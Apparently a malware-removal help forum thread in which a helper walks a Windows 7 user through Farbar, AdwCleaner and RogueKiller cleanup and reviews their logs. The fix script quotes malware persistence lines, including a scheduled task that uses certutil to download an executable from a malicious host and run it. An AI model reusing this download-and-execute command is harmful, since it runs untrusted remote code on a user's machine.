Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (10/01/2020 01:13:38 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe".Error in manifest or policy file "C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe" on line 0.
Invalid Xml syntax.

Error: (10/01/2020 12:54:01 AM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper – Error 1316. The specified account already exists.

Error: (10/01/2020 12:27:11 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (09/30/2020 11:54:09 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper – Error 1316. The specified account already exists.

Error: (09/30/2020 10:53:57 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper – Error 1316. The specified account already exists.

Error: (09/30/2020 09:53:57 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper – Error 1316. The specified account already exists.

Error: (09/30/2020 08:53:57 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper – Error 1316. The specified account already exists.


System errors:
=============
Error: (10/01/2020 01:33:00 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:58 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:57 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:54 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.

Error: (10/01/2020 01:32:49 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The TrueVector Internet Monitor service failed to start due to the following error:
Access is denied.


Windows Defender:
===================================
Date: 2019-12-23 12:19:36.646
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name;=TrojanDownloader:Win32/Harnig&threatid;=17555
Name:TrojanDownloader:Win32/Harnig
ID:17555
Severity:Severe
Category:Trojan Downloader
Path Found:containerfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar;file:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2019-12-22 14:14:00.316
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name;=TrojanDownloader:Win32/Harnig&threatid;=17555
Name:TrojanDownloader:Win32/Harnig
ID:17555
Severity:Severe
Category:Trojan Downloader
Path Found:containerfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar;file:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2019-12-22 11:37:46.712
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name;=TrojanDownloader:Win32/Harnig&threatid;=17555
Name:TrojanDownloader:Win32/Harnig
ID:17555
Severity:Severe
Category:Trojan Downloader
Path Found:containerfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar;file:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2019-12-21 13:37:23.269
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name;=TrojanDownloader:Win32/Harnig&threatid;=17555
Name:TrojanDownloader:Win32/Harnig
ID:17555
Severity:Severe
Category:Trojan Downloader
Path Found:containerfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar;file:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2019-12-20 16:56:31.071
Description:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name;=TrojanDownloader:Win32/Harnig&threatid;=17555
Name:TrojanDownloader:Win32/Harnig
ID:17555
Severity:Severe
Category:Trojan Downloader
Path Found:containerfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar;file:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);filelocalcopy:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar->LotR BfME 1.03 NoDVD.exe->(FSG-v2.0);webfile:C:\ProgramData\Microsoft\Windows Defender\LocalCopy\{D0F4481C-9EEF-4533-BDDE-66DE096BCA8E}-LotR BfME 1.03 NoDVD.rar
Detection Type:Concrete
Detection Source:System
Status:Unknown
Process Name:

Date: 2020-03-01 02:57:19.627
Description:
Windows Defender has encountered an error trying to update the engine.
New Engine Version:1.1.16800.2
Previous Engine Version:1.1.6402.0
Update Source:User
Error Code:0x8050800c
Error description:An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support.

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 08/01/2014
Motherboard: ASRock FM2A58M-VG3+ R2.0
Processor: AMD A8-7600 Radeon R7, 10 Compute Cores 4C+6G
Percentage of memory in use: 39%
Total physical RAM: 11188.71 MB
Available physical RAM: 6733.47 MB
Total Virtual: 22375.62 MB
Available Virtual: 16901.34 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:215.82 GB) (Free:37.61 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (East) (Fixed) (Total:715.69 GB) (Free:4.36 GB) NTFS
Drive e: () (Fixed) (Total:2794.5 GB) (Free:18.34 GB) NTFS


==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (Size: 2794.5 GB) (Disk ID: 1887ED5F)

Partition: GPT.

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 000ACBE6)
Partition 1: (Active) - (Size=215.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=715.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

 

 

 

 

I'm on Windows 7 64 bit

This can be a problem.  This is an old outdated Operating system that Microsoft does not support any more.

All security updates have stopped for any version of Windows 7. What ever we attempt to do to remove infections from this computer will remain open to re-infection.

 

I do see infections on the computer, how bad they are,  I don't know but,  you should uninstall any game cracks and keygens that are on here and avoid downloading any in the future.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

ProxyGate, please read over the below link
https://www.bleepingcomputer.com/startups/MainService.exe-29195.html

ProxyGate is an application that falsely claims to enhance the web browsing experience by providing access to a number of proxy servers.
These fake promises often trick users into believing that ProxyGate is a legitimate application, however, it is categorized as adware and a potentially unwanted program (PUP)
It's possible tools used to scan your computer could possibly delete this,  I would uninstall it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
consider
Read over the below article of related items from Iobit…..it's an older article related to and would be nice if IObit has changed of which I have no idea, I've never used it nor do I tell people to remove it if it's on their machines. I link them to articles.
Also would like to mention that lawsuits were filed and fought in court so be careful what you publicly type and say about tools and products online.

https://www.bleepingcomputer.com/forums/t/587695/thoughts-about-iobit-products-good-bad-ok/

 

It's possible tools used to scan your computer could possibly delete this
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

Let's see or attempt to remove the infection.  One thing I want to say is we can try,  being this is a windows 7 machine runs risk.

 

~~~~~

Start Farbar Recovery Scan Tool  with Administrator privileges
(Right click on the FRST icon and select Run as administrator)
    
highlight on the  text below and select Copy.
beginning with Start:: and finishing with End::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Highlight the entire content of the quote box below and select Copy.

 

Start::
CloseProcesses:
CreateRestorePoint:

CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [Ohm] => explorer.exe hxxp://exinariuminix.info <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [PatientBush] => C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-546064741-869659242-2245885051-1000\…\Run: [CloudNet] => C:\Users\Ohm\AppData\Roaming\3d03298b616c\3d03298b616c.exe [549376 2020-09-05] () [File not signed] <==== ATTENTION
Task: {366DB73E-E78B-4751-BC71-A89166259168} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4055040 2020-09-26] () [File not signed] <==== ATTENTION
Task: {C958D574-ED9E-424F-B2D0-DADA4F5A739A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://babsitef.com/app/app.exe C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Ohm\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {FF7440FF-5D97-480D-B1A4-A6269A7B4EC8} - System32\Tasks\Ohm => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ohm /t REG_SZ /d "explorer.exe hxxp://exinariuminix.info" <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
FF NewTab: Mozilla\Firefox\Profiles\s6poxj0c.default -> hxxp://securedsearch.lavasoft.com/?pr=vmn&id=webcompa&ent=hp_WCYID10449__190316
R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S4 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
U3 iswSvc; no ImagePath
SearchScopes: HKU\S-1-5-21-546064741-869659242-2245885051-1000 -> {993F5746-4C15-42BC-99C1-064A1764271B} URL = hxxps://securesearch.org?q={searchTerms}
FirewallRules: [{47CC63F3-6BAA-4882-96C7-C305F6992ACB}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\transition\transition.exe => No File
FirewallRules: [{2E3A88C4-89CC-4008-991D-C0629550F690}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\transition\transition.exe => No File
FirewallRules: [{A80CC8D2-5C63-455B-9E36-9FC1B63A807F}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\SlayTheSpire\jre\bin\javaw.exe => No File
FirewallRules: [{C34293E2-0B59-4B57-94BE-82E20CC75699}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\SlayTheSpire\jre\bin\javaw.exe => No File
FirewallRules: [{1B2BD8AE-607B-4872-9499-E953029E0B84}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{B4F5A801-3878-468A-A1BA-18887D12603D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{201DA782-50B1-4C46-AEE1-8F882551B6BD}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher.exe => No File
FirewallRules: [{2BF2B7E9-497C-43FC-BCD9-4293D45FEA88}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\KROSMAGA\Ankama Launcher.exe => No File
FirewallRules: [{BEB58DE9-F53A-4D6C-9DAE-BFED7C497104}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\Supreme Commander - Forged Alliance\bin\ForgedAlliance.exe => No File
FirewallRules: [{2F91B7E6-97E5-4EB8-9CEC-281BB31729F5}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\Supreme Commander - Forged Alliance\bin\ForgedAlliance.exe => No File
FirewallRules: [{615CA74A-9FA7-435B-A2D3-C5EC5420C160}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\GPGNet\GPG.Multiplayer.Client.exe => No File
FirewallRules: [{CB0031D4-314A-49B9-8448-5C9BBC22064F}] => (Allow) D:\StAllIns!!\GAMES2!!\Supreme Commander Forged Alliance\GPGNet\GPG.Multiplayer.Client.exe => No File
FirewallRules: [{FA89ABF0-B149-4ED7-8F26-EBA86DBD24A3}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\game.dat => No File
FirewallRules: [{6BB12D78-4F1D-46D4-ADE3-E96E5249B41A}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME I\game.dat => No File
FirewallRules: [{F7A4F0BB-D213-445F-8539-394FA63A00A5}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WK\game.dat => No File
FirewallRules: [{38FAC518-FA42-429A-87B5-57E7003673B7}] => (Allow) D:\StAllIns!!\GAMES2!!\Lord of the Rings!\B4ME II WK\game.dat => No File
FirewallRules: [{2FFFC05C-4C08-4F00-AE97-882BEE851EE5}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{B59BF623-940E-4B28-98C6-74D94A78B3AE}] => (Allow) D:\StAllIns!!\STEAM!!\steamapps\common\Grim Dawn\x64\Grim Dawn.exe => No File
FirewallRules: [{9AA97FD0-55F1-4DE4-8B20-41936E7DB7A4}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Warhammer.exe => No File
FirewallRules: [{2285BE7C-7364-443A-9EC3-49ED213640EC}] => (Allow) E:\StallInGGrade!\WARHAMMER!\Warhammer.exe => No File
VirusTotal: C:\Program Files (x86)\wcze\206367889.exe
EmptyTemp:
C:\Windows\Temp\*.*
End::

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Start FRST (FRST64) with Administrator privileges
Press the Fix button. FRST will process the lines copied above from the clipboard.
When finished, a log file Fixlog.txt will pop up and saved in the same location the tool was ran from.

Please copy and paste its contents in your next reply.

 

This might take a few extra minutes to complete or take extra time to complete since I've instructed the tool to run a file through Virus Total.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

Download and run AdwCleaner

Download AdwCleaner from here and save it to your desktop.

  • run AdwCleaner by clicking on Scan Now
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean and Repair
  • if it asks to reboot, allow the reboot
  • on reboot, click on View Log File; please attach the content of the log to your next reply.
  • ============================================


    Run RogueKiller

    IMPORTANT: Please remove any usb or external drives from the computer and close all running programs before you run this scan!

    Download RogueKiller to your desktop
  • for Windows Vista/7/8/10, right click -> run as administrator, for XP simply double-click on RogueKiller.exe
  • click on Scan then Start under ‘Standard Scan (recommended)’
  • Wait for the scan to complete
  • On completion, the results will be displayed
  • Check every single entry (threat found), and click on the Remove Selected button
  • On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
  • This will open the report in Notepad. Copy/paste its content in your next reply
  • click on Report
  • click Open and then select text file
  • save the file to your Desktop as RKreport.txt
  • copy/paste the content in your next post
  • NOTE: DO NOT attempt to remove anything that the scan detects –everything that is reported is not necessarily bad

Please post the contents of the RKreport.txt in your next reply.

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please post these 3 logs when finished.

 

Oh I didn't even notice Windows 7 support stopped, or I may have heard about it but forgot since it wasn't that long ago, Well I will try switching to 8, and that was part of the plan, but not on this machine. I'd really appreciate if you can clean this one as much as possible regardless, because this machine/installation has a lot of stuff on it and is configured just right so it's not worth undoing it to me. I'd prefer to just switch hard drives or machines instead, and I'm mostly using it offline lately anyway, and after the cleanup with limited online use max, precisely because part of the reason for this cleanup is moving on.

Now I did uninstall the 2 programs and did the scans but before I did them and after your reply, just over this one day, the infestation got worse. I accidentally restarted the machine with online connection on which is something I don't actually do, and it seems this is what it was looking for because a bunch more stuff than normal activated on startup and installed some nonsense like a ScrSnap to desktop and a thing called VICS and now my default browser automatically opens and spams to various ad links regularly even though I keep closing it and even without connection (it used to do so before once startup and forgot to mention, but only once and now it's way worse). And I did not want to touch it before you got a chance to look at it, but the scans I performed after didn't seem to remove it anyway and after all the cleanup they are still on here and the browser still does that.

As for the scans and cleanup I did them and they worked great but it was a bit confusing with the instructions because the software were probably updated so it wasn't quite as described. For AdAware I only had a Quarantine button, and then I went and manually deleted them from there after the restart and the logs were made, and for Roguekiller I assume you mean the Scan and Removal log files? Anyway here are the scans…

Ok, it seems that one Farbar log is like way too long to post along with the rest so I will post it separately afterwards, here are the other 3:

# ——————————-
# Malwarebytes AdwCleaner 8.0.7.0
# ——————————-
# Build:    07-22-2020
# Database: 2020-07-20.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# ——————————-
# Mode: Clean
# ——————————-
# Start:    10-02-2020
# Duration: 00:00:07
# OS:       Windows 7 Ultimate
# Cleaned:  58
# Failed:   1


***** [ Services ] *****

Deleted       WCAssistantService
Deleted       pgt_svc

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted       C:\Program Files (x86)\IObit\Advanced SystemCare
Deleted       C:\Program Files (x86)\Lavasoft\Web Companion
Deleted       C:\Program Files (x86)\ProxyGate
Deleted       C:\Program Files (x86)\Seed Trade
Deleted       C:\Program Files (x86)\Tencent
Deleted       C:\ProgramData\Application Data\Lavasoft\Web Companion
Deleted       C:\ProgramData\IObit\Advanced SystemCare
Deleted       C:\ProgramData\Lavasoft\Web Companion
Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted       C:\Users\Ohm\AppData\LocalLow\IObit\Advanced SystemCare
Deleted       C:\Users\Ohm\AppData\Local\Lavasoft\WEBCOMPANION.EXE_URL_SIQ0LWF3TZGXP2KHFKLLYBK3IDTBEHNG
Deleted       C:\Users\Ohm\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Users\Ohm\AppData\Roaming\Lavasoft\Web Companion
Deleted       C:\Users\Ohm\AppData\Roaming\Tencent
Deleted       C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\Windows\SysWOW64\h@tkeysh@@k.dll
Deleted       C:\Windows\System32\drivers\Winmon.sys
Deleted       C:\Windows\System32\drivers\WinmonFS.sys
Deleted       C:\Windows\System32\drivers\WinmonProcessMonitor.sys
Deleted       C:\Windows\windefender.exe

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\DRIVER BOOSTER SCHEDULER

***** [ Registry ] *****

Deleted       HKCU\Software\DreamTrips
Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKLM\SOFTWARE\CLASSES\DIRECTORY\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted       HKLM\SOFTWARE\CLASSES\DRIVE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted       HKLM\SOFTWARE\CLASSES\LNKFILE\SHELLEX\CONTEXTMENUHANDLERS\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F7FA602A-068D-43BF-9845-2F0717CB7492}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Scheduler
Deleted       HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3189DD01-591B-4A9A-8B8A-B8B9713C2AC3}
Deleted       HKLM\Software\Classes\CLSID\{2803063F-4B8D-4dc6-8874-D1802487FE2D}
Deleted       HKLM\Software\Classes\Interface\{BA935377-E17C-4475-B1BF-DE3110613A99}
Deleted       HKLM\Software\Classes\TypeLib\{60AD0991-ECD4-49DC-B170-8B7E7C60F51B}
Deleted       HKLM\Software\MICROSOFT\TechnologyDesktopnew
Deleted       HKLM\Software\Wow6432Node\IOBIT\ASC
Deleted       HKLM\Software\Wow6432Node\IObit\Advanced SystemCare
Deleted       HKLM\Software\Wow6432Node\IObit\RealTimeProtector
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{79cfde76-aac6-4c6d-96c1-fa765f5f048c}|DisplayIcon
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{79cfde76-aac6-4c6d-96c1-fa765f5f048c}|DisplayName
Deleted       HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{79cfde76-aac6-4c6d-96c1-fa765f5f048c}|UninstallString
Deleted       HKLM\Software\Wow6432Node\\Classes\Interface\{BA935377-E17C-4475-B1BF-DE3110613A99}
Deleted       HKLM\Software\Wow6432Node\\Classes\TypeLib\{60AD0991-ECD4-49DC-B170-8B7E7C60F51B}
Deleted       HKLM\Software\Wow6432Node\\Microsoft\MediaPlayer\ShimInclusionList\browser.exe
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|Codec Settings UAC Manager
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Advanced SystemCare_is1
Deleted       HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1
Deleted       HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKU\.DEFAULT\Software\Mozilla\NativeMessagingHosts\com.webcompanion.native
Deleted       HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com

***** [ Chromium (and derivatives) ] *****

Not Deleted   User-Agent Switcher for Chrome - djflhoibgkdhkhhcedjiklpkjnoahfmg

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [7025 octets] - [02/10/2020 20:39:51]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########



RogueKiller Anti-Malware V14.7.3.0 (x64) [Sep 15 2020] (Free) by Adlice Software
mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits
Started in : Normal mode
User : Ohm [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Signatures : 20200213_081045, Driver : Loaded
Mode : Standard Scan, Scan – Date : 2020/10/02 20:50:13 (Duration : 00:24:23)
Switches : -minimize

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[Suspicious.Path (Potentially Malicious)] mdgj1d4hgv2.exe (3400) – C:\Users\Ohm\AppData\Roaming\eu4rgpytxsg\mdgj1d4hgv2.exe -> Found
[Suspicious.Path (Potentially Malicious)] mdgj1d4hgv2.tmp (428) – C:\Users\Ohm\AppData\Local\Temp\is-7D64V.tmp\mdgj1d4hgv2.tmp -> Found
[Suspicious.Path (Potentially Malicious)] q1rhluhcq3z.exe (3956) – C:\Users\Ohm\AppData\Roaming\rxkbz25zqhh\q1rhluhcq3z.exe -> Found
[Suspicious.Path (Potentially Malicious)] q1rhluhcq3z.tmp (4008) – C:\Users\Ohm\AppData\Local\Temp\is-H9477.tmp\q1rhluhcq3z.tmp -> Found
[Suspicious.Path (Potentially Malicious)] y53vmvtzyzf.exe (4200) – C:\Users\Ohm\AppData\Roaming\pwzzfimxnz2\y53vmvtzyzf.exe -> Found
[Suspicious.Path (Potentially Malicious)] y53vmvtzyzf.tmp (4252) – C:\Users\Ohm\AppData\Local\Temp\is-JEH9T.tmp\y53vmvtzyzf.tmp -> Found
